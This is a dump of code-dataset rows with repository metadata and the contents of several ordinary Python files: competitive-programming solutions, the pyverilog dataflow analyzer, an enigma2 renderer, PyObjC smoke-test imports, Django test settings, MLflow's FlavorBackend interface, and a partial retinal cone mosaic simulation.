blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2f9ff8e134eaa96dab94a8adf57b27fb8a23be23 | d6cf604d393a22fc5e071a0d045a4fadcaf128a6 | /Challenge Book/JOI_2007_C.py | 7e53612c30d66f59e862f33ab20efe583c393bc7 | [] | no_license | shikixyx/AtCoder | bb400dfafd3745c95720b9009881e07bf6b3c2b6 | 7e402fa82a96bc69ce04b9b7884cb9a9069568c7 | refs/heads/master | 2021-08-03T21:06:45.224547 | 2021-07-24T11:58:02 | 2021-07-24T11:58:02 | 229,020,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import numpy as np
import sys
sys.setrecursionlimit(10 ** 7)
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
# 半分全列挙
N, M = map(int, readline().split())
P = np.array([0] + read().split(), np.int64)
P = P[P <= M]
P2 = (P[:, None] + P[None, :]).ravel()
P2 = P2[P2 <= M]
P2.sort()
# numpyで並列にやらないと間に合わない
I = np.searchsorted(P2, M-P2, side='right') - 1
P4 = P2 + P2[I]
print(max(P4))
| [
"[email protected]"
] | |
5aa39cd29ff6236b62f61c9c3f51364eea44b3a5 | 419db2c95082e57eab3ebea9568693c2a961add7 | /pyverilog/dataflow/dataflow_analyzer.py | 8136f89271efed5ed13e2089e74ec92349f3bf33 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hoangt/Pyverilog-1 | ef309528150a3174e74126b2f1328ca9824fcbfe | d0cb60a5633e88f59a7c5c36dff8981f000ee525 | refs/heads/master | 2021-01-19T22:53:52.170548 | 2015-09-16T15:23:16 | 2015-09-16T15:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,027 | py | #-------------------------------------------------------------------------------
# dataflow_analyzer.py
#
# Verilog module signal/module dataflow analyzer
#
# Copyright (C) 2013, Shinya Takamaeda-Yamazaki
# License: Apache 2.0
#-------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
import subprocess
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) )
sys.setrecursionlimit(16 * 1024)
import pyverilog
import pyverilog.utils
import pyverilog.utils.version
from pyverilog.vparser.parser import VerilogCodeParser
from pyverilog.dataflow.modulevisitor import ModuleVisitor
from pyverilog.dataflow.signalvisitor import SignalVisitor
from pyverilog.dataflow.bindvisitor import BindVisitor
class VerilogDataflowAnalyzer(VerilogCodeParser):
def __init__(self, filelist, topmodule='TOP', noreorder=False, nobind=False,
preprocess_include=None,
preprocess_define=None):
self.topmodule = topmodule
self.terms = {}
self.binddict = {}
self.frametable = None
files = filelist if isinstance(filelist, tuple) or isinstance(filelist, list) else [ filelist ]
VerilogCodeParser.__init__(self, files,
preprocess_include=preprocess_include,
preprocess_define=preprocess_define)
self.noreorder = noreorder
self.nobind = nobind
def generate(self):
ast = self.parse()
module_visitor = ModuleVisitor()
module_visitor.visit(ast)
modulenames = module_visitor.get_modulenames()
moduleinfotable = module_visitor.get_moduleinfotable()
signal_visitor = SignalVisitor(moduleinfotable, self.topmodule)
signal_visitor.start_visit()
frametable = signal_visitor.getFrameTable()
if self.nobind:
self.frametable = frametable
return
bind_visitor = BindVisitor(moduleinfotable, self.topmodule, frametable,
noreorder=self.noreorder)
bind_visitor.start_visit()
dataflow = bind_visitor.getDataflows()
self.frametable = bind_visitor.getFrameTable()
self.terms = dataflow.getTerms()
self.binddict = dataflow.getBinddict()
def getFrameTable(self):
return self.frametable
#-------------------------------------------------------------------------
def getInstances(self):
if self.frametable is None: return ()
return self.frametable.getAllInstances()
def getSignals(self):
if self.frametable is None: return ()
return self.frametable.getAllSignals()
def getConsts(self):
if self.frametable is None: return ()
return self.frametable.getAllConsts()
def getTerms(self):
return self.terms
def getBinddict(self):
return self.binddict
if __name__ == '__main__':
from optparse import OptionParser
INFO = "Verilog module signal/module dataflow analyzer"
VERSION = pyverilog.utils.version.VERSION
USAGE = "Usage: python dataflow_analyzer.py -t TOPMODULE file ..."
def showVersion():
print(INFO)
print(VERSION)
print(USAGE)
sys.exit()
optparser = OptionParser()
optparser.add_option("-v","--version",action="store_true",dest="showversion",
default=False,help="Show the version")
optparser.add_option("-I","--include",dest="include",action="append",
default=[],help="Include path")
optparser.add_option("-D",dest="define",action="append",
default=[],help="Macro Definition")
optparser.add_option("-t","--top",dest="topmodule",
default="TOP",help="Top module, Default=TOP")
optparser.add_option("--nobind",action="store_true",dest="nobind",
default=False,help="No binding traversal, Default=False")
optparser.add_option("--noreorder",action="store_true",dest="noreorder",
default=False,help="No reordering of binding dataflow, Default=False")
(options, args) = optparser.parse_args()
filelist = args
if options.showversion:
showVersion()
for f in filelist:
if not os.path.exists(f): raise IOError("file not found: " + f)
if len(filelist) == 0:
showVersion()
verilogdataflowanalyzer = VerilogDataflowAnalyzer(filelist, options.topmodule,
noreorder=options.noreorder,
nobind=options.nobind,
preprocess_include=options.include,
preprocess_define=options.define)
verilogdataflowanalyzer.generate()
directives = verilogdataflowanalyzer.get_directives()
print('Directive:')
for dr in sorted(directives, key=lambda x:str(x)):
print(dr)
instances = verilogdataflowanalyzer.getInstances()
print('Instance:')
for module, instname in sorted(instances, key=lambda x:str(x[1])):
print((module, instname))
if options.nobind:
print('Signal:')
signals = verilogdataflowanalyzer.getSignals()
for sig in signals:
print(sig)
print('Const:')
consts = verilogdataflowanalyzer.getConsts()
for con in consts:
print(con)
else:
terms = verilogdataflowanalyzer.getTerms()
print('Term:')
for tk, tv in sorted(terms.items(), key=lambda x:str(x[0])):
print(tv.tostr())
binddict = verilogdataflowanalyzer.getBinddict()
print('Bind:')
for bk, bv in sorted(binddict.items(), key=lambda x:str(x[0])):
for bvi in bv:
print(bvi.tostr())
| [
"[email protected]"
] | |
30e1bb070924905323da2b3adf333239477b7c6d | 8bac6c63a7b826bfd6b415e6faa51ff22505d112 | /openNFR-skin-2018/usr/lib/enigma2/python/Components/Renderer/NFRSambaVpnIp_renderer.py | fabdc9a68e371461e2f463086cbfa48cd40c720c | [] | no_license | stein17/Skins-for-openNFR | 03330102b7d883f8485297cea0468143d9116b6f | ca6c5d02035e4bacdad6efc45995249a317b7fb6 | refs/heads/master | 2023-03-12T19:58:50.112456 | 2022-03-21T07:02:03 | 2022-03-21T07:02:03 | 94,653,786 | 0 | 15 | null | 2023-03-02T17:52:37 | 2017-06-17T23:05:42 | Python | UTF-8 | Python | false | false | 467 | py | from Renderer import Renderer
from enigma import ePixmap
class NFRSambaVpnIp_renderer(Renderer):
def __init__(self):
Renderer.__init__(self)
GUI_WIDGET = ePixmap
def postWidgetCreate(self, instance):
self.changed((self.CHANGED_DEFAULT,))
def changed(self, what):
if what[0] != self.CHANGED_CLEAR:
if self.source and hasattr(self.source, "pixmap"):
if self.instance:
self.instance.setScale(1)
self.instance.setPixmap(self.source.pixmap)
| [
"[email protected]"
] | |
55cef7ba6f4bab4b32350b0bcbab3ce2d4c00d12 | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /development-support/wheel-smoke-test.py | fc47c188998f8298c69edac63841101e78c93158 | [] | no_license | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,668 | py | """
Helper script for performing smoke tests on an installed
copy of PyObjC
# NOTE: This file is not yet complete
"""
import platform
from distutils.version import LooseVersion
import objc # noqa: F401
from AddressBook import * # noqa: F401, F403
from AppleScriptKit import * # noqa: F401, F403
from AppleScriptObjC import * # noqa: F401, F403
from ApplicationServices import * # noqa: F401, F403
from Automator import * # noqa: F401, F403
from CFNetwork import * # noqa: F401, F403
from Cocoa import * # noqa: F401, F403
from CoreData import * # noqa: F401, F403
from CoreServices import * # noqa: F401, F403
from DiskArbitration import * # noqa: F401, F403
from ExceptionHandling import * # noqa: F401, F403
from GameController import * # noqa: F401, F403
from HIServices import * # noqa: F401, F403
from Quartz import * # noqa: F401, F403
sys_version = LooseVersion(platform.mac_ver()[0])
if sys_version >= LooseVersion("10.5"):
from CalendarStore import * # noqa: F401, F403
from Collaboration import * # noqa: F401, F403
from CoreText import * # noqa: F401, F403
from DictionaryServices import * # noqa: F401, F403
from FSEvents import * # noqa: F401, F403
if sys_version >= LooseVersion("10.6"):
from CoreLocation import * # noqa: F401, F403
from CoreWLAN import * # noqa: F401, F403
from iTunesLibrary import * # noqa: F401, F403
if sys_version >= LooseVersion("10.7"):
from AVFoundation import * # noqa: F401, F403
if sys_version >= LooseVersion("10.8"):
from Accounts import * # noqa: F401, F403
from EventKit import * # noqa: F401, F403
from GameCenter import * # noqa: F401, F403
if sys_version >= LooseVersion("10.9"):
from AVKit import * # noqa: F401, F403
if sys_version >= LooseVersion("10.10"):
from CloudKit import * # noqa: F401, F403
from CoreBluetooth import * # noqa: F401, F403
from CryptoTokenKit import * # noqa: F401, F403
from FinderSync import * # noqa: F401, F403
if sys_version >= LooseVersion("10.11"):
from Contacts import * # noqa: F401, F403
from ContactsUI import * # noqa: F401, F403
if sys_version >= LooseVersion("10.12"):
from Intents import * # noqa: F401, F403
from MediaPlayer import * # noqa: F401, F403
if sys_version >= LooseVersion("10.13"):
from BusinessChat import * # noqa: F401, F403
from ColorSync import * # noqa: F401, F403
from CoreML import * # noqa: F401, F403
from CoreSpotlight import * # noqa: F401, F403
from ExternalAccessory import * # noqa: F401, F403
from Vision import * # noqa: F401, F403
print("")
print("SMOKE TEST PASSED")
print("")
| [
"[email protected]"
] | |
a59b69de96b87c4963e2a5082a415c273af284f3 | 2da8bcfb9a72e507812a8723e38ad6d030c300f1 | /two_sum_1.py | 57a56e2fc2bce51207bff8c27039bcaa0809aea2 | [] | no_license | aditya-doshatti/Leetcode | 1a4e0f391a7d6ca2d7f8fdc35e535f4ec10fb634 | eed20da07896db471ea6582785335e52d4f04f85 | refs/heads/master | 2023-04-06T02:18:57.287263 | 2023-03-17T03:08:42 | 2023-03-17T03:08:42 | 218,408,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 995 | py | '''
1. Two Sum
Easy
Given an array of integers, return indices of the two numbers such that they add up to a specific target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
Example:
Given nums = [2, 7, 11, 15], target = 9,
Because nums[0] + nums[1] = 2 + 7 = 9,
return [0, 1].
https://leetcode.com/problems/two-sum/
'''
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
if len(nums) <= 1:
return False
buff_dict = {}
for i in range(len(nums)):
if nums[i] in buff_dict:
return [buff_dict[nums[i]], i]
else:
buff_dict[target - nums[i]] = i
# for i in range(len(nums)):
# for j in range(i+1,len(nums)):
# if (nums[i] + nums[j]) == target:
# return [i,j]
| [
"[email protected]"
] | |
bf7fcf88de1f76cb2ade9e1d5ad78bb6c9d5350f | 8ae0bf166da68488efec84fe79063f874687b332 | /tests/ext/django/settings.py | 47565381bb011dbafa23c965dd6905ecef88234f | [
"BSD-3-Clause"
] | permissive | snopoke/slycache | 75aafcd0fb9c9289a292c907f48159652e275f93 | 412e9e81a8c53f684f3fd7c5dafb6b06ecfbd0c0 | refs/heads/main | 2023-06-01T19:20:12.847651 | 2021-03-16T20:30:28 | 2021-03-16T20:30:28 | 340,279,785 | 0 | 0 | NOASSERTION | 2021-06-14T07:26:50 | 2021-02-19T06:34:25 | Python | UTF-8 | Python | false | false | 494 | py | DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
},
}
INSTALLED_APPS = ['slycache.ext.django']
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': 60,
'LOCATION': 'location-1',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': 60,
'LOCATION': 'location-2',
},
}
SECRET_KEY = 'foobarbaz'
| [
"[email protected]"
] | |
5171d6acac1e78b70a50a813ff700ead3317d7d9 | 7b7c570b30d6d7a0e9b904c7cb378cfb0d0f0e07 | /mlflow/models/flavor_backend.py | 894829a8cfcb69840c6c12785cdff07fc6a9cbb5 | [
"Apache-2.0"
] | permissive | mlflow/mlflow | ca97bfbbf32f8e59f454e428f5e46eb3d34d062f | 37298ffafcd34002352d01d579d4524790544267 | refs/heads/master | 2023-09-01T13:15:53.902815 | 2023-09-01T09:00:42 | 2023-09-01T09:00:42 | 136,202,695 | 14,102 | 3,748 | Apache-2.0 | 2023-09-14T21:52:42 | 2018-06-05T16:05:58 | Python | UTF-8 | Python | false | false | 3,421 | py | from abc import ABCMeta, abstractmethod
from mlflow.utils.annotations import developer_stable
@developer_stable
class FlavorBackend:
"""
Abstract class for Flavor Backend.
This class defines the API interface for local model deployment of MLflow model flavors.
"""
__metaclass__ = ABCMeta
def __init__(self, config, **kwargs): # pylint: disable=unused-argument
self._config = config
@abstractmethod
def predict(self, model_uri, input_path, output_path, content_type):
"""
Generate predictions using a saved MLflow model referenced by the given URI.
Input and output are read from and written to a file or stdin / stdout.
:param model_uri: URI pointing to the MLflow model to be used for scoring.
:param input_path: Path to the file with input data. If not specified, data is read from
stdin.
:param output_path: Path to the file with output predictions. If not specified, data is
written to stdout.
:param content_type: Specifies the input format. Can be one of {``json``, ``csv``}
"""
pass
@abstractmethod
def serve(
self,
model_uri,
port,
host,
timeout,
enable_mlserver,
synchronous=True,
stdout=None,
stderr=None,
):
"""
Serve the specified MLflow model locally.
:param model_uri: URI pointing to the MLflow model to be used for scoring.
:param port: Port to use for the model deployment.
:param host: Host to use for the model deployment. Defaults to ``localhost``.
:param timeout: Timeout in seconds to serve a request. Defaults to 60.
:param enable_mlserver: Whether to use MLServer or the local scoring server.
:param synchronous: If True, wait until server process exit and return 0, if process exit
with non-zero return code, raise exception.
If False, return the server process `Popen` instance immediately.
:param stdout: Redirect server stdout
:param stderr: Redirect server stderr
"""
pass
def prepare_env(self, model_uri, capture_output=False):
"""
Performs any preparation necessary to predict or serve the model, for example
downloading dependencies or initializing a conda environment. After preparation,
calling predict or serve should be fast.
"""
pass
@abstractmethod
def build_image(self, model_uri, image_name, install_mlflow, mlflow_home, enable_mlserver):
raise NotImplementedError
@abstractmethod
def generate_dockerfile(
self, model_uri, output_path, install_mlflow, mlflow_home, enable_mlserver
):
raise NotImplementedError
@abstractmethod
def can_score_model(self):
"""
Check whether this flavor backend can be deployed in the current environment.
:return: True if this flavor backend can be applied in the current environment.
"""
pass
def can_build_image(self):
"""
:return: True if this flavor has a `build_image` method defined for building a docker
container capable of serving the model, False otherwise.
"""
return callable(getattr(self.__class__, "build_image", None))
| [
"[email protected]"
] | |
4a6527f8ab80096d974ecbc2592c03ee486098cf | 6632896b4e320c932bdaa98b2caa16e057905333 | /utils/io/labels/character.py | 42500f3bb08e1952e8f60fcd45e82f1d64eb7841 | [
"MIT"
] | permissive | sky1170447398/tensorflow_end2end_speech_recognition | 56229b5de62c8a4580a9d349afe6ccdf20d478fb | 7ef52ae702db3852a7339136852bb14585e55b3b | refs/heads/master | 2021-07-13T14:26:22.117311 | 2017-10-12T00:51:12 | 2017-10-12T00:51:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,507 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
class Char2idx(object):
"""Convert from character to index.
Args:
map_file_path (string): path to the mapping file
"""
def __init__(self, str_char, map_file_path):
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[line[0]] = int(line[1])
def __call__(self, str_char):
"""
Args:
str_char (string): a sequence of characters
Returns:
index_list (list): character indices
"""
char_list = list(str_char)
# Convert from character to index
index_list = list(map(lambda x: self.map_dict[x], char_list))
return np.array(index_list)
class Kana2idx(object):
"""Convert from kana character to index.
Args:
map_file_path (string): path to the mapping file
"""
def __init__(self, map_file_path):
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[line[0]] = int(line[1])
def __call__(self, str_char):
"""
Args:
str_char (string): a sequence of kana characters
Returns:
index_list (list): kana character indices
"""
kana_list = list(str_char)
index_list = []
for i in range(len(kana_list)):
# Check whether next kana character is a double consonant
if i != len(kana_list) - 1:
if kana_list[i] + kana_list[i + 1] in self.map_dict.keys():
index_list.append(
int(self.map_dict[kana_list[i] + kana_list[i + 1]]))
i += 1
elif kana_list[i] in self.map_dict.keys():
index_list.append(int(self.map_dict[kana_list[i]]))
else:
raise ValueError(
'There are no kana character such as %s' % kana_list[i])
else:
if kana_list[i] in self.map_dict.keys():
index_list.append(int(self.map_dict[kana_list[i]]))
else:
raise ValueError(
'There are no kana character such as %s' % kana_list[i])
return np.array(index_list)
class Idx2char(object):
"""Convert from index to character.
Args:
map_file_path (string): path to the mapping file
capital_divide (bool, optional): set True when using capital-divided
character sequences
space_mark (string): the space mark to divide a sequence into words
"""
def __init__(self, map_file_path, capital_divide=False, space_mark=' '):
self.capital_divide = capital_divide
self.space_mark = space_mark
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[int(line[1])] = line[0]
def __call__(self, index_list, padded_value=-1):
"""
Args:
index_list (np.ndarray): list of character indices.
Batch size 1 is expected.
padded_value (int): the value used for padding
Returns:
str_char (string): a sequence of characters
"""
# Remove padded values
assert type(index_list) == np.ndarray, 'index_list should be np.ndarray.'
index_list = np.delete(index_list, np.where(
index_list == padded_value), axis=0)
# Convert from indices to the corresponding characters
char_list = list(map(lambda x: self.map_dict[x], index_list))
if self.capital_divide:
char_list_tmp = []
for i in range(len(char_list)):
if i != 0 and 'A' <= char_list[i] <= 'Z':
char_list_tmp += [self.space_mark, char_list[i].lower()]
else:
char_list_tmp += [char_list[i].lower()]
str_char = ''.join(char_list_tmp)
else:
str_char = ''.join(char_list)
return str_char
# TODO: change to batch version
| [
"[email protected]"
] | |
9ba285150af283cf9d35c2c7919feedb6398d693 | 33f351a8444ad0f63b7efd5014957d58175681a8 | /mosaic.py | 3b52f1f9dde233cf6907ce5c3a9eca462b5657ae | [] | no_license | rjonnal/FEM_raster_model | 21bb070c397d73733e366893a8d11314430d8b0f | 7568aec5aeff93146c7481c216f2360e03a36f2c | refs/heads/master | 2021-01-11T21:23:09.319209 | 2017-03-15T22:05:31 | 2017-03-15T22:05:31 | 78,775,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,047 | py | import numpy as np
from scipy import interpolate
from scipy.signal import convolve2d
from matplotlib import pyplot as plt
import os,sys
from time import time,sleep
from fig2gif import GIF
from cone_density import ConeDensityInterpolator
from random import shuffle
from data_store import H5
import datetime
class Mosaic:
def __init__(self,x1=-0.25,x2=0.25,y1=-0.25,y2=0.25,central_field_strength=10.0,potential_fwhm_deg=.01,N_cones=0,locality=0.02,granularity=0.0025,noise=0.0,intensity_fwhm_deg=.008,use_cdf=False,hdf5fn=None):
self.noise = noise
self.use_cdf = use_cdf
self.gain = 1.0
self.N_neighbors = 0
self.shift_mean = np.inf
self.shift_std = np.inf
self.shift_max = -np.inf
self.shift_min = np.inf
if hdf5fn is None:
self.age = 0
self.x1 = min(x1,x2)
self.x2 = max(x1,x2)
self.y1 = min(y1,y2)
self.y2 = max(y1,y2)
self.dx = self.x2 - self.x1
self.dy = self.y2 - self.y1
self.xmid = (self.x1+self.x2)/2.0
self.ymid = (self.y1+self.y2)/2.0
max_rad = np.min(self.dx/2.0,self.dy/2.0)*np.sqrt(2)
cones_rad = np.random.rand(N_cones)**.5*max_rad
cones_theta = np.random.rand(N_cones)*np.pi*2
self.cones_x = (np.cos(cones_theta)*cones_rad).astype(np.float32)
self.cones_y = (np.sin(cones_theta)*cones_rad).astype(np.float32)
self.cones_I = (10.0 + 1.0*np.random.randn(N_cones)).clip(5.0,15.0)
self.N_cones = N_cones
self.locality = locality
self.granularity = granularity
self.theta_step = np.pi/10.0
self.theta = np.arange(0,np.pi*2,self.theta_step)
self.neighborhood = self.locality*2
self.cone_potential_fwhm_deg = potential_fwhm_deg
self.potential_sigma = potential_fwhm_deg/(2.0*np.sqrt(2.0*np.log(2)))
self.intensity_sigma = intensity_fwhm_deg/(2.0*np.sqrt(2.0*np.log(2)))
self.central_field_strength = central_field_strength
self.timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
self.tag = self.get_tag()
self.h5 = H5('./histories/%s.hdf5'%self.tag)
self.h5.put('/params/N_cones',self.N_cones)
self.h5.put('/params/locality',self.locality)
self.h5.put('/params/granularity',self.granularity)
self.h5.put('/params/theta_step',self.theta_step)
self.h5.put('/params/neighborhood',self.neighborhood)
self.h5.put('/params/cone_potential_fwhm_deg',self.cone_potential_fwhm_deg)
self.h5.put('/params/potential_sigma',self.potential_sigma)
self.h5.put('/params/intensity_sigma',self.intensity_sigma)
self.h5.put('/params/central_field_strength',self.central_field_strength)
self.h5.put('/params/rect',[self.x1,self.x2,self.y1,self.y2])
self.h5.put('/intensities',self.cones_I)
self.h5.put('/age',self.age)
else:
self.timestamp = hdf5fn.split('_')[-1].replace('.hdf5','')
self.h5 = H5(hdf5fn)
self.N_cones = self.h5.get('/params/N_cones').value
self.locality = self.h5.get('/params/locality').value
self.granularity = self.h5.get('/params/granularity').value
self.theta_step = self.h5.get('/params/theta_step').value
self.neighborhood = self.h5.get('/params/neighborhood').value
self.cone_potential_fwhm_deg = self.h5.get('/params/cone_potential_fwhm_deg').value
self.intensity_sigma = self.h5.get('/params/intensity_sigma').value
self.potential_sigma = self.h5.get('/params/potential_sigma').value
self.central_field_strength = self.h5.get('/params/central_field_strength').value
self.x1,self.x2,self.y1,self.y2 = self.h5.get('/params/rect')[:]
self.cones_I = self.h5.get('/intensities')[:]
self.age = self.h5.get('/age').value-1
self.cones_x = self.h5.get('/%06d/cones_x'%self.age)
self.cones_y = self.h5.get('/%06d/cones_y'%self.age)
self.mosaic = self.h5.get('/%06d/mosaic'%self.age)
self.dx = self.x2 - self.x1
self.dy = self.y2 - self.y1
self.xmid = (self.x1+self.x2)/2.0
self.ymid = (self.y1+self.y2)/2.0
def scale(self,im):
im = im.astype(float)
return (im-im.min())/(im.max()-im.min())
def save_mosaic0(self,N=512):
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
yr = np.linspace(y1,y2,N)
XX,YY = np.meshgrid(xr,yr)
out = np.zeros(XX.shape,dtype=np.float32)
for idx,(x,y,I) in enumerate(zip(self.cones_x,self.cones_y,self.cones_I)):
xx = XX - x
yy = YY - y
out = out + np.exp(-(xx**2+yy**2)/(2.0*self.intensity_sigma**2))*I
self.h5.put('/%06d/mosaic'%self.age,out)
self.mosaic = out
def get_mosaic(self,N=512):
profile = self.make_cone_profile(N)
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
yr = np.linspace(y1,y2,N)
dx = np.mean(np.diff(xr))
dy = np.mean(np.diff(yr))
out = np.zeros((len(yr),len(xr)))
for idx,(x,y,I) in enumerate(zip(self.cones_x,self.cones_y,self.cones_I)):
if x>self.x1 and x<self.x2 and y>self.y1 and y<self.y2:
left = np.where(xr<x)[0][-1]
right = np.where(xr>=x)[0][0]
top = np.where(yr<y)[0][-1]
bottom = np.where(yr>=y)[0][0]
for py in [top,bottom]:
for px in [left,right]:
yfrac = 1.0-np.abs(yr[py]-y)/dy
xfrac = 1.0-np.abs(xr[px]-x)/dx
out[py,px] = xfrac*yfrac*I
if False:
plt.subplot(1,2,1)
plt.plot(x,y,'ks')
plt.xlim((xr[left],xr[right]))
plt.ylim((yr[top],yr[bottom]))
plt.subplot(1,2,2)
plt.imshow(out[top:bottom+1,left:right+1],interpolation='none')
plt.colorbar()
plt.show()
else:
continue
out = self.conv(out,profile)
out = self.scale(out)
return out
def save_mosaic(self,N=512):
out = self.get_mosaic(N)
self.h5.put('/%06d/mosaic'%self.age,out)
self.mosaic = out
def conv(self,a,b):
sy,sx = a.shape
# fft both after doubling size w/ zero-padding
# this prevents circular convolution
af = np.fft.fft2(a,s=(sy*2,sx*2))
bf = np.fft.fft2(b,s=(sy*2,sx*2))
# multiply
abf = af*bf
# inverse fft
abfi = np.fft.ifft2(abf)
# crop first (sy+1)//2-1 pixels because of zero-padding
y1 = (sy+1)//2-1
y2 = y1+sy
x1 = (sx+1)//2-1
x2 = x1+sx
abfi = abfi[y1:y2,x1:x2]
return np.abs(abfi)
def make_cone_profile(self,N,gaussian=True):
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
xr = xr - np.mean(xr)
yr = np.linspace(y1,y2,N)
yr = yr - np.mean(yr)
xx,yy = np.meshgrid(xr,yr)
if gaussian:
p = np.exp(-(xx**2+yy**2)/(2.0*self.intensity_sigma**2))
else:
p = np.zeros(xx.shape)
d = np.sqrt(xx**2+yy**2)
p[np.where(d<self.intensity_sigma)] = 1.0
return p
def get_tag(self):
# main part of tag: ncones_centralfield_conefield_rect
fmts = ['%06d','%0.1f','%0.4f','%0.2f','%0.2f','%0.2f','%0.2f']
params = (self.N_cones,self.central_field_strength,self.cone_potential_fwhm_deg,
self.x1,self.x2,self.y1,self.y2)
tag = ''
for f in fmts:
tag = tag + f + '_'
tag = tag%params
tag = tag.replace('-','m')
tag = tag + self.timestamp
return tag
def record(self):
def put(name,data):
self.h5.put('/%06d/%s'%(self.age,name),data)
put('cones_x',self.cones_x)
put('cones_y',self.cones_y)
put('N_neighbors',self.N_neighbors)
put('gain',self.gain)
def find_neighbors(self,x,y,rad):
d = np.sqrt((x-self.cones_x)**2+(y-self.cones_y)**2)
neighbors = np.where(np.logical_and(d<rad,d>0))[0]
#neighbors = np.where(d<rad)[0]
return neighbors
def compute_field(self,x,y):
neighbors = self.find_neighbors(x,y,self.neighborhood)
theta = self.theta + np.random.rand()*self.theta_step
self.gain = 1.0
mags = self.granularity*self.gain*np.linspace(0.01,2.0,19)
XX = []
YY = []
for mag in mags:
XXv = np.cos(theta)*mag
YYv = np.sin(theta)*mag
XXv = list(XXv)
YYv = list(YYv)
XX = XX + XXv
YY = YY + YYv
XX = np.array(XX)
YY = np.array(YY)
xx = XX+x
yy = YY+y
f,n,xx,yy = self.compute_field_helper(xx,yy,neighbors)
f = f+np.random.randn(len(f))*np.sqrt(f)*self.noise
return f,n,xx,yy
def compute_full_field(self,N=64):
xvec = np.linspace(self.x1,self.x2,N)
yvec = np.linspace(self.y1,self.y2,N)
xx,yy = np.meshgrid(xvec,yvec)
xx = xx.ravel()
yy = yy.ravel()
neighbors = np.arange(len(self.cones_x))
return self.compute_field_helper(xx,yy,neighbors)
def compute_field_helper(self,xx,yy,neighbors):
N_neighbors = len(neighbors)
# build a matrix of coordinates
dx = np.tile(xx,(N_neighbors,1)).T
dy = np.tile(yy,(N_neighbors,1)).T
# get the coordinates of the neighbors
neighbor_x_coords = self.cones_x[neighbors]
neighbor_y_coords = self.cones_y[neighbors]
dx = (dx - neighbor_x_coords).T
dy = (dy - neighbor_y_coords).T
field = np.exp(-(dx**2+dy**2)/(2.0*self.potential_sigma**2))
#field = field + np.sqrt(field)*np.random.randn(*field.shape)
field = np.sum(field,axis=0)
if False:
plt.figure()
self.plot()
plt.plot(xx,yy,'gs')
plt.figure()
self.plot()
plt.plot(dx,dy,'gs')
plt.figure()
plt.plot(field)
plt.show()
# box coords for plotting
x1 = np.min(xx)
x2 = np.max(xx)
y1 = np.min(yy)
y2 = np.max(yy)
if False:
plt.subplot(1,2,1)
plt.plot(x,y,'ro')
self.plot()
plt.plot([x1,x2,x2,x1,x1],[y1,y1,y2,y2,y1],'b-')
plt.subplot(1,2,2)
plt.imshow(np.reshape(field,(self.NY,self.NX)),interpolation='none')
plt.show()
#cfield = np.exp(xx**2+yy**2)*self.central_field_strength
cfield = np.sqrt(xx**2+yy**2)*self.central_field_strength
field = field + cfield
return field,neighbors,xx,yy
def xidx(self,x):
return (x-self.subx1)/self.subdx*self.NX
def yidx(self,y):
return (y-self.suby1)/self.subdy*self.NY
def display_field(self,x,y,f=None,n=None):
if f is None:
f,n = self.compute_field(x,y)
f = np.reshape(f,(self.NY,self.NX))[::-1,::-1]
locality = self.locality
